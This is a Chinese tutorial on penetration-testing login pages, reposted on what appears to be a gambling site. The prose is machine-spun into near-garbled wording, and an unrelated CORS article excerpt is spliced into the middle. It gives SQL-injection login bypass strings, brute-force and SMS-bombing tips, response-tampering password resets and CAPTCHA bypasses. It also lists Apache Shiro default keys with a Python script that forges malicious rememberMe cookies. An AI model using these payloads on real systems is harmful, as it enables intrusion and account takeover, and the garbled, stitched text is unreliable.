上岸页面渗入测试罕见的几种思绪与总结! | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

上岸页面渗入测试罕见的几种思绪与总结!

申博_新闻事件 申博 46次浏览 未收录 0个评论

媒介

我们在举行渗入测试的时刻,常常会碰到许多网站站点,而有的网站仅仅是基于一个上岸接口举行处置惩罚的。尤其是在内网环境的渗入测试中,客户常常丢给你一个上岸网站页面,没有测试账号,让你本身举行渗入测试,一最先经验不足的话,能够会无从下手。本日就来简朴说一下如安在只要一个上岸页面的状况下,来举行渗入测试。

0x00

在前提许可的状况下,我们可以拿在渗入测试的最先之前拿出我们的扫描器来举行扫描,现在我们最常常运用的就是AWVS和Nessus,除此之外,我们还可以运用一些别的自动化测试东西,比方Nikto扫描器,Appscan,W3af,以及近来长亭科技的Xray扫描器,都可以尝尝。尤其是Xray扫描器,据说有许多小伙伴靠它挖到了许多破绽。

以下是这些东西的一些运用方法,不举行赘述
    Nikto https://zhuanlan.zhihu.com/p/70225775
    Xray  https://chaitin.github.io/xray/#/
    W3af  https://www.freebuf.com/column/145984.html
    Appscan https://zhuanlan.zhihu.com/p/28729371

0x01–SQL注入

全能暗码绕过
假如我们可以直接绕过登录,来直接接见体系内部资本,那自然是最好不过的了。全能暗码就是个中一最好用的一种,虽然存在的能够性不大,然则偶然也是存在的,轻微尝试一下也不会糟蹋太多时候。
比方’or 1=1 –
“or “a”=”a
全能暗码在网上异常多,随便搜一下就有
比方如许,就可以直接接见背景
上岸页面渗入测试罕见的几种思绪与总结!

上岸页面渗入测试罕见的几种思绪与总结!

登录口SQL注入
有的体系在登录口就存在SQL注入,现在我碰到过比较多的是Oracle以及MySQL的登录口注入,我们可以在登录处先抓一个包,然后依据抓包信息来组织Payload。值得一提的是,有时刻我们须要在Burp里修正一下发包花样(change body encoding),才胜利注入。

在这给个例子:
平常登录报错

而且,这类的SQL注入并不稀有,在许多网站中都可以举行尝试,很有能够会存在此破绽

0x02 明文传输/用户名可罗列/爆破弱口令

明文传输
多是我们做渗入测试中,最罕见的一种破绽,实际上它并不能算得上是一种破绽,仅仅只能说是一种不足之处罢了,明文传输在网站上随处可见,除了银行网站,很有能够每一个暗码都是经由特别加密然后再举行传输的。

用户名可罗列
此破绽存在重要是由于页面临所输入的账号暗码举行的推断所回显的数据不一样,我们可以经由过程这点来举行用户名的罗列,然后经由过程罗列后的账户名来举行弱口令的爆破。防备手腕的话仅须要将用户名与暗码失足的回显变成一样即可,比方用户名或暗码失足。

爆破弱口令
弱口令可以说是渗入测试中,最最罕见,也是伤害“最大”的一种破绽,由于毫无技术性,毫无新意,然则却充满了“破坏性”,尤其是在内网环境中,弱口令更是无处不在。Web页面最常常运用的爆破东西为Burp,我们平常运用Nmap扫描也能够扫出其他端口存在,比方3389,SSH等。

弱口令爆破东西引荐,概况可看以下,不在赘述:
Hydra:https://yq.aliyun.com/articles/608406/
超等弱口令:链接:https://pan.baidu.com/s/1mkwnxu19Aq-KEVCWOZn99w 提取码:blj3
复制这段内容后翻开百度网盘手机App,操纵更轻易哦
御剑RDP爆破: https://github.com/foryujian/yujianrdpcrack
Bruter: https://www.uedbox.com/post/8478/

另外,我们还可以依据网站域名,以及网络的一些信息来举行定制化爆破,比方我在一次内网渗入测试中,发现了管理员的名字缩写为crj,然后我就天生了一堆暗码,末了胜利上岸账号暗码为crj112233。

定制化天生字典: http://tools.mayter.cn/
字典: https://github.com/rootphantomer/Blasting_dictionary

另有许多字典,可以在网上多网络一些,有时刻你离Getshell,仅仅只差一个弱口令。

另外,有时刻我们还能够碰到存在默许暗码的体系,在这给出一些网上公然的默许账户暗码

 

上岸页面渗入测试罕见的几种思绪与总结!

上岸页面渗入测试罕见的几种思绪与总结!

0x03 扫描

目次扫描
在我看来,这是最好用的目次扫描东西:https://github.com/maurosoria/dirsearch ,DirSearch已经成为了我一样平常渗入工作中密不可分的东西之一,而且我们可以多级别扫描,在罗列子目次的目次,许多时刻可以找到突破口。
除此之外,另有御剑:https://github.com/52stu/- 也是比较常常运用的

JS扫描
JS文件我们在渗入测试中也是经常常运用到的东西,有时刻我们可以在JS文件中找到我们日常平凡看不到的东西,比方重置暗码的JS,发送短信的JS,都是有能够未受权可接见的。JS扫描的话引荐运用JSFind: https://github.com/Threezh1/JSFinder
同时它也会提取页面中的URL,简朴举例
nmap扫描
Nmap的壮大功用能让我们第一时候猎取网站的端口信息,而这些端口信息中常常可以赋予我们异常大的协助,比方开放了3389端口,或许一些敏感端口的探测,Nmap的运用方法比拟不须要我再多说,每一个平安工程师都必须要通晓的一种东西,以下是我的一些端口小总结,愿望可以授与人人一点儿协助。

Exploiting CORS misconfigurations for Bitcoins and bounties

原文地址:https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties?tdsourcetag=s_pcqq_aiomsg 在本文中,我将展示如何识别和利用配置错误的CORS。本文内容摘自AppSec USA大会上的演讲内容,并做了相应的提炼。如果您的时间比较充裕(或阅读本文时遇到了难以理解的内容)的话,我强烈建议您查看相关的幻灯片并观看相关视频。 What is CORS? (Cross Origin Resource Sharing) 跨域资源共享(CORS)是这样一种技术,网站可

上岸页面渗入测试罕见的几种思绪与总结!

 

在扫描目次与JS这块,要注重屡次爆破,遍历接见多级域名的目次与JS。
我就曾在一个学校网站中,运用Nmap对批量网段的探测,取得了一个上岸网站,而且在网站中遍历目次,取得了一个test页面,末了在这个页面的JS文件中,猎取到了一个接口,经由过程这个接口重置了主登录页面的暗码。

0x04 框架破绽

寻觅CMS,或许网页框架,以及某些厂商的效劳存在破绽
比方Apache中间件组件Shiro反序列化破绽,这里简朴说一下:
须要一个ysoserial.jar https://github.com/frohoff/ysoserial
以及默许秘钥
4AvVhmFLUs0KTA3Kprsdag==
2AvVhdsgUs0FSA3SDFAdag==
2AvVhdDFCVdfdfDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
kPH+bIxk5D2deZiIxcaaaA
wGiHplamyXlVB11UXWol8g==
6ZmI6I2j5Y+R5aSn5ZOlAA==
AsfawfsdfaAasdWWW==
Z3VucwAAAAAAAAAAAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
1QWLxg+NYmxraMoxAXu/Iw==
POC
from Crypto.Cipher import AES
from Crypto import Random
from base64 import b64encode
from base64 import b64decode

BS = AES.block_size
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

def encrypt(key, text):
    IV = Random.new().read(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, IV=IV)
    data = b64encode(IV + cipher.encrypt(pad(text)))
    return data

key= b64decode('2AvVhdsgUs0FSA3SDFAdag==')
print encrypt(key, open('payload.dat','rb').read())

运用方法
1:java -jar ysoserial.jar URLDNS “你的ceye.io或许burp的collaborator client功用中”>payload.dat
2:运转python剧本,天生cookie

3:将cookie复制到burp发包,此时DNSlog就会纪录,我们可以再次组织举行敕令实行,在这不举行深切。
致远A8-getshell: https://www.cnblogs.com/dgjnszf/p/11104594.html
Thinkphp: https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
Struts2: https://github.com/HatBoy/Struts2-Scan
weblogic: https://github.com/rabbitmask/WeblogicScan
以及各大Java反序列化破绽等等,这里的破绽都说不完了。

0x05

寻觅逻辑破绽,比方遗忘暗码,恣意用户注册

恣意重置暗码
比方

此时客户端会发一个验证码包,我们这是随便输入验证码,发包,返回包。
返回包毛病的回显为{“status”:0}
将返回包的东西换成{“status”:1}
即可重置暗码
上岸页面渗入测试罕见的几种思绪与总结!

乌云示例:http://www.anquan.us/static/bugs/wooyun-2013-039809.html

恣意用户注册
爆破注册页面的验证码,即可恣意用户注册

一样,这里的验证码假如为四位数的话,有时刻也能够存在可爆破,可举行恣意用户重置暗码

短信轰炸
短信轰炸很罕见,平常在发送验证码后抓包,不停repeate即可,假如做了肯定防护的话,在增加空格,或许特别符号,或+86等都可以举行绕过

未经由防护的短信爆破非常罕见
上岸页面渗入测试罕见的几种思绪与总结!

不完全的登录
这个破绽我找到过一次,就是在登录页面,随便输入恣意的账户和暗码,然后抓包,修正返回包,骗过前端,从而取得肯定的权限,其功用不完善,然则照旧可以看到许多敏感数据。

逻辑破绽这里要依据差别网站来举行测试,逻辑破绽的体式格局多种多样,常常会碰到许多新鲜的姿态,比方cookie某字段为Guest,修正为admin即可替换用户身份的,还须要在一样平常工作中多加总结。

0x06

禁用JS插件,检察页面源代码12
禁用JS和检察源代码,有时刻会有意想不到的欣喜。

比方某些重定向,某些权限缺失,在我们未受权进入背景一瞬间,就会重定向归去登录页面,而假如此时我们禁用了JS,则可以举行肯定权限的掌握。

检察源代码则不必多说,有的不大智慧的程序员能够会在源代码里泄漏一些不可告人的隐秘,比方测试账号,另有我们能够会找到一些网站的背景构造,以及JS接口。

0x07

URL重定向
URL重定向是我们渗入测试中非经罕见的一个破绽,平常涌现在以下参数里,而登录时常常也有这个URL重定向到背景网站,我们修正这个背景网站的URL即可跳转到恣意页面,可用于垂纶页面的制造
比方 http://www.aaa.com?url=aHR0cDovL2FkbWluLmFhYS5jb20=
url背面常会举行base64编码处置惩罚

罕见URL跳转参数:
redirect
redirect_to
redirect_url
url
jump
jump_to
target
to
link
linkto
Domain

0x08

种种未受权接见,免登录进入背景
未受权接见在这里有更强的大佬总结了,其须要我们对端口举行注重视察。
https://xz.aliyun.com/t/6103

0x9 验证码题目

验证码可修正接受者
可将A账号的修正暗码验证码接受者修正为B,如许A账号的验证码就会发到B的手机上,从而B可以重置A的账号暗码
比方A账号moblephone=13333888888 ,这点是可控的,我们修正为moblephone=18888888888,即可收到A账号的重置验证码
上岸页面渗入测试罕见的几种思绪与总结!

登录验证码可绕过
能够存在全能验证码0000或许9999,不过此类状况较为稀有。更多的状况为修正返回包,能够会涌现可绕过逻辑推断。

验证码可爆破
验证码失效的时候太长,而且为纯数字或许太短字符,致使可被爆破。

验证码回显前端
有的网站验证码会回显到前端,只须要抓包即可取得验证码
验证码不革新
验证码不会自动革新,致使我们可一码屡次运用,我们只须要输入一次验证码就可以让我们可以最先举行暴力破解。

验证码辨认
这里运用PKAV的验证码自动辨认
链接:https://pan.baidu.com/s/1-l16Nxse7SqQdgSiPZS2-A 提取码:szo2

0x10 总结

简朴的来讲,碰到一个上岸站点,我们须要做的时刻有
1、前提许可的状况下开启破绽扫描
2、敏感信息的探测,比方端口,目次,JS文件
3、爆破弱口令
4、抓包看看是不是存在逻辑破绽,或许SQL注入举行尝试
5、寻觅框架破绽
PS:假如碰到某些大网站的主站登录,比方银行,发起摒弃,寻觅其他营业,比方雇用站点登录等。

 


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明上岸页面渗入测试罕见的几种思绪与总结!
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址